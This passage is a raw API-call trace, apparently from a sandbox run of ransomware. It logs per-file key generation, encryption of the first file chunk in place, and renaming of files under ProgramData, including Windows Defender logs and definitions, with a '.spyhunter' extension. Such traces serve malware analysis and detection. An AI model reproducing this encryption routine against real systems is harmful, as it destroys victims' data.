GetProcessHeap () returned 0x2c0000 [0129.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.630] GetProcessHeap () returned 0x2c0000 [0129.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321598 | out: hHeap=0x2c0000) returned 1 [0129.632] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6a0 | out: pbBuffer=0x25cf6a0) returned 1 [0129.632] GetProcessHeap () returned 0x2c0000 [0129.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.633] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf698*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf698*=0x30) returned 1 [0129.633] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.633] GetProcessHeap () returned 0x2c0000 [0129.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.633] GetProcessHeap () returned 0x2c0000 [0129.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84fd8 | out: hHeap=0x2c0000) returned 1 [0129.636] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf690 | out: pbBuffer=0x25cf690) returned 1 [0129.636] GetProcessHeap () returned 0x2c0000 [0129.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.636] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf688*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf688*=0x30) returned 1 [0129.636] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.636] GetProcessHeap () returned 0x2c0000 [0129.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.636] GetProcessHeap () returned 0x2c0000 [0129.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e908 | out: hHeap=0x2c0000) returned 1 [0129.641] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf678 | out: pbBuffer=0x25cf678) returned 1 [0129.641] GetProcessHeap () returned 0x2c0000 [0129.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.641] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf670*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf670*=0x30) returned 1 [0129.641] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.642] GetProcessHeap () returned 0x2c0000 [0129.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.642] GetProcessHeap () returned 0x2c0000 [0129.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d378 | out: hHeap=0x2c0000) returned 1 [0129.642] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf670 | out: pbBuffer=0x25cf670) returned 1 [0129.642] GetProcessHeap () returned 0x2c0000 [0129.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.642] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf668*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf668*=0x30) returned 1 [0129.642] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.642] GetProcessHeap () returned 0x2c0000 [0129.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.642] GetProcessHeap () returned 0x2c0000 [0129.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d288 | out: hHeap=0x2c0000) returned 1 [0129.642] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf670 | out: pbBuffer=0x25cf670) returned 1 [0129.642] GetProcessHeap () returned 0x2c0000 [0129.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.643] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf668*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf668*=0x30) returned 1 [0129.643] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.643] GetProcessHeap () returned 0x2c0000 [0129.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.643] GetProcessHeap () returned 0x2c0000 [0129.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e820 | out: hHeap=0x2c0000) returned 1 [0129.643] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf668 | out: pbBuffer=0x25cf668) returned 1 [0129.643] GetProcessHeap () returned 0x2c0000 [0129.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.643] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf660*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf660*=0x30) returned 1 [0129.643] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.643] GetProcessHeap () returned 0x2c0000 [0129.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.643] GetProcessHeap () returned 0x2c0000 [0129.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d198 | out: hHeap=0x2c0000) returned 1 [0129.646] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf658 | out: pbBuffer=0x25cf658) returned 1 [0129.646] GetProcessHeap () returned 0x2c0000 [0129.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.646] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf650*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf650*=0x30) returned 1 [0129.647] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.647] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 79 [0129.647] StrStrW (lpFirst="Unknown.Log", lpSrch=".txt") returned 0x0 [0129.648] GetProcessHeap () returned 0x2c0000 [0129.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.648] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf614, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf614*=0x1a86, lpOverlapped=0x0) returned 1 [0129.664] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffe57a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.665] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1a86, lpNumberOfBytesWritten=0x25cf614, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf614*=0x1a86, lpOverlapped=0x0) returned 1 [0129.665] GetProcessHeap () returned 0x2c0000 [0129.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.665] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.665] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf614, lpOverlapped=0x0 | out: lpBuffer=0x25cf654*, lpNumberOfBytesWritten=0x25cf614*=0x4, lpOverlapped=0x0) returned 1 [0129.665] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf614, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf614*=0x30, lpOverlapped=0x0) returned 1 [0129.665] CloseHandle (hObject=0x17c) returned 1 [0129.665] GetProcessHeap () returned 0x2c0000 [0129.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.665] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.spyhunter") returned 89 [0129.665] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.spyhunter" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log.spyhunter")) returned 1 [0129.677] GetProcessHeap () returned 0x2c0000 [0129.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.677] GetProcessHeap () returned 0x2c0000 [0129.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.677] GetProcessHeap () returned 0x2c0000 [0129.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eefa88 | out: hHeap=0x2c0000) returned 1 [0129.677] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf658 | out: pbBuffer=0x25cf658) returned 1 [0129.678] GetProcessHeap () returned 0x2c0000 [0129.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.678] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf650*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf650*=0x30) returned 1 [0129.678] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.704] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned 116 [0129.704] StrStrW (lpFirst="mpasdlta.vdm", lpSrch=".txt") returned 0x0 [0129.704] GetProcessHeap () returned 0x2c0000 [0129.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.704] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf614, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf614*=0x2800, lpOverlapped=0x0) returned 1 [0129.705] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.706] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf614, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf614*=0x2800, lpOverlapped=0x0) returned 1 [0129.709] GetProcessHeap () returned 0x2c0000 [0129.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.710] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.710] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf614, lpOverlapped=0x0 | out: lpBuffer=0x25cf654*, lpNumberOfBytesWritten=0x25cf614*=0x4, lpOverlapped=0x0) returned 1 [0129.711] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf614, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf614*=0x30, lpOverlapped=0x0) returned 1 [0129.711] CloseHandle (hObject=0x17c) returned 1 [0129.711] GetProcessHeap () returned 0x2c0000 [0129.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.712] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.spyhunter") returned 126 [0129.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.spyhunter" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm.spyhunter")) returned 1 [0129.712] GetProcessHeap () returned 0x2c0000 [0129.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.712] GetProcessHeap () returned 0x2c0000 [0129.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.713] GetProcessHeap () returned 0x2c0000 [0129.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47820 | out: hHeap=0x2c0000) returned 1 [0129.713] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf650 | out: pbBuffer=0x25cf650) returned 1 [0129.713] GetProcessHeap () returned 0x2c0000 [0129.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.713] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf648*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf648*=0x30) returned 1 [0129.713] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.759] GetProcessHeap () returned 0x2c0000 [0129.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.759] GetProcessHeap () returned 0x2c0000 [0129.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cbf8 | out: hHeap=0x2c0000) returned 1 [0129.759] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf650 | out: pbBuffer=0x25cf650) returned 1 [0129.759] GetProcessHeap () returned 0x2c0000 [0129.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.759] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf648*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf648*=0x30) returned 1 [0129.759] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0129.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 60 [0129.926] StrStrW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.926] GetProcessHeap () returned 0x2c0000 [0129.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.926] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf60c*=0x16a, lpOverlapped=0x0) returned 1 [0129.927] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.927] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x25cf60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf60c*=0x16a, lpOverlapped=0x0) returned 1 [0129.927] GetProcessHeap () returned 0x2c0000 [0129.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.928] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.928] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf60c, lpOverlapped=0x0 | out: lpBuffer=0x25cf64c*, lpNumberOfBytesWritten=0x25cf60c*=0x4, lpOverlapped=0x0) returned 1 [0129.928] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf60c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf60c*=0x30, lpOverlapped=0x0) returned 1 [0129.928] CloseHandle (hObject=0xf4) returned 1 [0129.928] GetProcessHeap () returned 0x2c0000 [0129.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.928] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.spyhunter") returned 70 [0129.928] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn.spyhunter")) returned 1 [0129.929] GetProcessHeap () returned 0x2c0000 [0129.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.929] GetProcessHeap () returned 0x2c0000 [0129.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.929] GetProcessHeap () returned 0x2c0000 [0129.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85230 | out: hHeap=0x2c0000) returned 1 [0129.930] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf648 | out: pbBuffer=0x25cf648) returned 1 [0129.930] GetProcessHeap () returned 0x2c0000 [0129.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.930] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf640*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf640*=0x30) returned 1 [0129.930] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0129.931] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 58 [0129.931] StrStrW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.931] GetProcessHeap () returned 0x2c0000 [0129.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.931] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf604*=0x15e, lpOverlapped=0x0) returned 1 [0129.932] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.932] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x25cf604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf604*=0x15e, lpOverlapped=0x0) returned 1 [0129.932] GetProcessHeap () returned 0x2c0000 [0129.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.932] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.932] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf604, lpOverlapped=0x0 | out: lpBuffer=0x25cf644*, lpNumberOfBytesWritten=0x25cf604*=0x4, lpOverlapped=0x0) returned 1 [0129.932] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf604, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf604*=0x30, lpOverlapped=0x0) returned 1 [0129.932] CloseHandle (hObject=0xf4) returned 1 [0129.932] GetProcessHeap () returned 0x2c0000 [0129.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.933] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.spyhunter") returned 68 [0129.933] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn.spyhunter")) returned 1 [0129.933] GetProcessHeap () returned 0x2c0000 [0129.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.933] GetProcessHeap () returned 0x2c0000 [0129.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.933] GetProcessHeap () returned 0x2c0000 [0129.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2cdf8 | out: hHeap=0x2c0000) returned 1 [0129.934] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf648 | out: pbBuffer=0x25cf648) returned 1 [0129.934] GetProcessHeap () returned 0x2c0000 [0129.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf640*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf640*=0x30) returned 1 [0129.934] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, 